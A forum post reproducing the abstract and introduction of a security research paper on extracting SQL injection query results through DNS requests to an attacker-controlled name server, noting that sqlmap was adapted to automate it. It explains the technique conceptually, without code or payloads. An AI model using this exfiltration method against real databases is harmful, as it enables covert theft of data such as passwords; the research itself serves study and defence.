Nytro Posted February 18, 2014 Report Posted February 18, 2014 Data Retrieval over DNS in SQL Injection AttacksMiroslav ŠtamparAVL-AST d.o.o., Zagreb, Croatiamiroslav.stampar@avl.comAbstractThis paper describes an advanced SQL injection technique where DNS resolution process is exploited for retrieval of malicious SQL query results. Resulting DNS requests are intercepted by attackers themselves at the controlled remote name server extracting valuable data.Open source SQL injection tool sqlmap [1] has been adjusted to automate this task. With modifications done, attackers are able to use this technique for fast and low-profile data retrieval, especially in cases where other standard ones fail.IntroductionExfiltration is a military term for removal of assets from within enemy territory by covert means. It now has an excellent modern usage in computing, meaning the illicit extraction of data from a system. The most covert data extraction method is considered to be the Domain Name Server (DNS) exfiltration [2]. This method can even be used on systems without a public network connection by resolving domain name queries outside the perimeter of trusted hosts through a series of internal and external name servers.DNS is a relatively simple protocol. Both the query made by a DNS client and the corresponding response provided by a DNS server use the same basic DNS message format. With the exception of zone transfers, which use TCP for the sake of reliability, DNS messages are encapsulated within a UDP datagram. To someone monitoring a machine with a tool like Wireshark [3], a covert channel implemented over DNS would look like a series of little blips that flash in and out of existence [4].The act of relaying DNS queries from secure systems to arbitrary internet-based name servers forms the basis of this uncontrolled data channel. Even if we assume that connections to public networks are not allowed, if the target host is able to resolve arbitrary domain names, data exfiltration is possible via forwarded DNS queries [5].When other faster SQL injection (SQLi) data retrieval techniques fail, data is usually retrieved in bit-by-bitmanner, which is very noisy1 and time consuming process. Thus, attackers will typically need tens ofthousands of requests to retrieve content of a regular sized table. What is going to be described is the technique where attackers can retrieve results for malicious SQL queries (e.g. administrator password) by provoking specially crafted DNS requests from vulnerable Database Management System (DBMS) and intercepting those at the other end, transferring dozens of resulting characters per single iteration.Download: http://arxiv.org/pdf/1303.3047.pdf 1 Quote
